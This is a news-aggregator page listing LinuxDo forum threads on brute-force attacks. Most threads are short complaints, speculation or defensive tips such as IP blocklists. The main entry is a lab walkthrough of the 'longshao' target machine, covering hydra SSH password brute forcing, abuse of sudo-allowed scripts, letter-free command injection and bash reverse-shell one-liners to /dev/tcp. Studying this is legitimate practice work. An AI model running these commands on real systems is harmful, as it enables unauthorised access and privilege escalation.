爆破 - WWW.YOUINFO.SITE - WWW.YOUINFO.SITE

LinuxDo 最新话题 · 2026-06-08 11:27:23+08:00 · tech

咋回事啊，一上班发现大伙觥筹交错，众宾欢也。奥特曼又被爆破了嘛 4 个帖子 - 3 位参与者阅读完整话题

LinuxDo 最新话题 · 2026-06-06 21:11:31+08:00 · tech

佬们来分析一下，有没有可能是A\使用mythos爆破了oai，用的还是Musk提供的新算力。。。美股都抽空了，全都套现准备下周，还有各种 b 和金银也都大幅下跌，连国内都把门关了，不让资金出去。 A\狙击 oai，Musk 也和 oai 有仇，去掉所有不合理的，Oai这么大的漏洞，不大可能是偶然发现的。。 3 个帖子 - 2 位参与者阅读完整话题

渗透靶机复盘（4）——ssh密码爆破、二进制文件分析、无字母数字的shell命令执行

LinuxDo 最新话题 · 2026-06-04 16:24:40+08:00 · tech

靶机来自 MazeSec（迷踪安全）： MazeSec | About 靶机名：longshao 系统：Linux 作者：超级黑暗无敌龙难度：Easy 依旧新鲜靶机，文章其实早就写好了，但是由于还在群内的做题时间，所以现在才发出来，欢迎大家学习和指导不多说，直接开始。信息收集靶机ip： 192.168.56.108 端口扫描 ┌──(kali㉿JYlover)-[~] └─$ nmap -p- 192.168.56.108 开放 22 、 80 端口，这次就很明显是从web入手了。一个登录页面。测了一下没有类似sql注入的问题。那就扫一下目录。常规信息收集： $ dirsearch -u 192.168.56.108 多出来一个 /dashboard.php （ /cgi-bin/printenv和/cgi-bin/test-cgi这两个应该是apache自带的一些配置文件，没有什么用）我们去访问dashboard: 直接给了ssh凭证，web端是白给的，所以我说侧重是在shell提权上。 baolong:jinhua 横向移动 $ ssh [email protected] # 输入：jinghua 登录到 baolong 用户。然后我们信息收集一波。 baolong@longshao:~$ sudo -l # Sorry, user baolong may not run sudo on longshao. baolong@longshao:~$ wget 192.168.56.1:9999/pspy64 baolong@longshao:~$ chmod +x pspy64 baolong@longshao:~$ ./pspy64 没有啥大收获。这里又传了 linpeas.sh （工具箱中的）上去扫了一遍。这是一个bash脚本，用于在 Linux 系统上自动进行信息收集和提权路径枚举。 baolong@longshao:~$ wget 192.168.56.1:9999/linpeas.sh Connecting to 192.168.56.1:9999 (192.168.56.1:9999) saving to 'linpeas.sh' linpeas.sh 100% |******************************************************************| 1032k 0:00:00 ETA 'linpeas.sh' saved baolong@longshao:~$ chmod +x linpeas.sh baolong@longshao:~$ ./linpeas.sh -bash: ./linpeas.sh: /bin/sh^M: bad interpreter: No such file or directory baolong@longshao:~$ sed -i 's/\r$//' linpeas.sh baolong@longshao:~$ ./linpeas.sh 注意这里如果是从windows上传过去可能会有这个换行符冲突的问题，我们可以用sed命令替换一下。然后他就会开始自动扫。也并没有扫到什么很有用的东西，但是也顺带有点收获：可以看到有3个普通用户: baolong chaojibaolong chaojiwudilong 可能是打横移链。（这名字起的，暴龙的进化之旅(～￣▽￣)～）又注意到/opt目录下有一个 internal 目录。（opt目录放第三方下载的东西，所以很多作者会把口子放在这里）既然没啥东西了，那我们肯定就去看看这个 internal 目录吧 baolong@longshao:~$ ls /opt/internal -la 看到有一个 parser_core 的二进制文件，root所有，属于 chaojibaolong 组，且组用户可执行。很明显是引导我们横移到 chaojibaolong 用户了。我们想把文件拉下来分析一下，但是也需要有 chaojibaolong 用户，其中我们也没发现其他横移的路子。没办法的时候就想想最笨的办法，直接去爆破一下ssh密码呢？ ┌──(kali㉿JYlover)-[~] └─$ hydra -l chaojibaolong -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.108 -t 4 -e nsr 还真给扫到了。 chaojibaolong/love123 可以拷贝下来了： $ scp [email protected]:/opt/internal/parser_core ~/tmp/ 这是在我们攻击机上执行的远程拷贝命令然后用ida打开看看。直接f5反汇编好像大概就是有一个 --debug 参数，…然后就可以执行 su chaojiwudilong 啦≡(▔﹏▔)≡。好吧看不懂。交给ai：必须root执行必须是 1 或 2 个参数（ argc - 2 <= 1 ）。 1 个参数：正常模式 2 个参数：若第二个参数为 --debug ，开启调试标志（这里argc[0]是程序本身，所以{ a2[2], "--debug" }不是检查第三个参数而是第二个）文件名必须 .log 结尾，文件必须在 /tmp/ 下 log文件存在的话就只是打印成功，不存在的时候且开启了调式模式，就会执行 su chaojiwudilong 那么很清晰，我们的目标是：以root身份执行这个程序–>启动调试模式–>指定一个不存在的log文件也就是 $ /opt/internal/parser_core /tmp/1.log --debug 如果root执行了这个命令，就可以切换身份了但是我们怎么去root执行呢？可能到这里就没什么思路了。那就登录。在信息收集一下sudo权限有没有。 baolong@longshao:~$ su chaojibaolong # 输入：love123 chaojibaolong@longshao:/home/baolong$ sudo -l 直接发现拥有无需密码执行 /usr/local/bin/check_parser 的权限。这是个什么东西呢，我们去看看。 chaojibaolong@longshao:/home/baolong$ vi /usr/local/bin/check_parser 是一个bash脚本大概是：检查uid是否为0，也就是检查是不是root执行。不是root直接退出检查第一个参数，如果第一个参数为空且第一个参数对应的路径不是普通文件，则退出。这里用的并运算（-a），所以如果有参数的话，就一定不会退出执行 parser_core ，并且把参数传递给它又清晰了，上面我们分析过，只需要执行 parser_core 并带有 --debug 参数就可以到 chaojiwudilong $ /opt/internal/parser_core /tmp/1.log --debug 我们不能root执行 parser 但是可以root执行 check_parser 呀，而 check_parser 又执行了 parser 。这样就间接执行了，而且参数原样传递，我们可以像直接调用 parser 一样，就是改一下名字。我们执行： $ sudo /usr/local/bin/check_parser /tmp/1.log --debug 横向完成。提权拿到最后一个普通用户，再看看sudo权限： $ sudo -l 可以无密码执行 /usr/local/bin/a.sh 去看看这个脚本。 chaojiwudilong@longshao:~$ cat /usr/local/bin/a.sh 终于能看懂了: 先把PATH直接改成 /usr/bin （这样所有命令会去 /usr/bin 下面找） cd到 /tmp 目录 <( ... ) 表示把命令执行的结果当一个临时文件，然后把临时文件的值赋值给 $CMD head -n1 | tr -d "[A-Za-z0-9/]" 表示取出第一行，删掉其中的数字字母和最后执行 $CMD 也就是这个脚本的参数，不能有数字字母和 / ，然后这个参数会被执行。这里就是一个无数字字母命令执行。虽然没有数字没有字母，但是还有 ! 、 ? 、 _ 这些特殊符号呀。这里首先我们要知道一个知识点，那就是 . <文件名> （注意有空格）是可以执行shell脚本的（ . 是 source 命令的简写，用于在当前 shell 进程中执行脚本），例如：这里看得很清楚， source <文件名> 可以成功执行 a 文件中的shell命令， . <文件名> 也可以所以我们流程就是：创建名为 _ 的文件，内容是shell命令—>sudo执行 a.sh ，—>传入 . _ 然后就打成任意命令执行了。 1. 2. 关于最后提权的小复盘我们要注意到脚本中： PATH=/usr/bin cd /tmp read CMD < <(head -n1 | tr -d "[A-Za-z0-9/]") eval "$CMD" 有一句改PATH的命令，所以有些命令我们最好用绝对路径，不然会默认去 /usr/bin 里面找例如我们的反弹shell。 bash -c 'exec bash -i &>/dev/tcp/192.168.56.1/8888 <&1' # 就要改成 /bin/bash -c 'exec /bin/bash -i &>/dev/tcp/192.168.56.1/8888 <&1' 不然就会报错因为 /usr/bin 下面没有 bash ，他是在 /bin/bash 这里还发现： echo "/bin/bash -i >& /dev/tcp/192.168.56.1/8888 0>&1">_ # 这个不行会报错这里不知道是为什么，可能是执行是的环境是 sh ？这里实在搞不懂了还有一点就是如果不用 _ ，用 ? 或者 ! 也是可以的，但是由于他们在shell中有特殊含义，所以要注意利用“”。知识点总结本次靶机遇到的知识点：遇到二进制文件可以拉下来反编译审计 source <文件名>是把文件名执行。可以写成 . 文件名，绕过限制这次靶机遇到的固定知识点比较少，大部分是根据实际情况来的分析，代码审计。大家可以自行复现 2 个帖子 - 2 位参与者阅读完整话题

如何缓解讨厌的IP探测与密码爆破

LinuxDo 最新话题 · 2026-06-01 22:56:27+08:00 · tech

今天上ssh工作被炸疯了，隔几分钟就被connect reset（不是怎么老被炸啊），这里给各位佬友分享一些“ 威胁情报源 ”，直接给他们ban掉，来辅助防范无差别网络攻击。 blocklist.de ：提供攻击各类服务器服务（比如我这次挨打的ssh）的恶意IP，直接用Fail2ban定时拉取然后ban掉 Spamhaus DROP ：提供被网络犯罪团伙控制的整个IP网段，也直接ban掉，里面也有防火墙规则可以用 Feodo Tracker ：提供僵尸网络命令与控制服务器的IP列表，直接使用他们的防火墙规则 Emerging Threats ：提供一套入侵检测规则，给IDS/IPS用的，这个得用suricata来配置装上它们之后无论是ssh还是网站的流量都干净很多了，希望能帮到各位佬友 1 个帖子 - 1 位参与者阅读完整话题

佬友助我，不知道是哪个屌毛，在爆破我的CPA....，之前是撞接口，现在直接爆破。

LinuxDo 最新话题 · 2026-06-01 13:47:03+08:00 · tech

10 个帖子 - 7 位参与者阅读完整话题

青龙面板升级后又被扫描尝试登录但不成功

LinuxDo 最新话题 · 2026-05-27 09:50:13+08:00 · tech

之前坛子里曝出来青龙面板随便爆破那次，我也中招了，后面我给青龙面板做了升级，升级完开了啥设置我也忘了（好像也没开啥？），今天一登吓到我了，一看全都是失败还稍微安心点。我比较好奇我的密码是弱密码，他们怎么也破不了了。刚才我开启两步验证了，不知道能不能加强安全防护，后面再观察观察 1 个帖子 - 1 位参与者阅读完整话题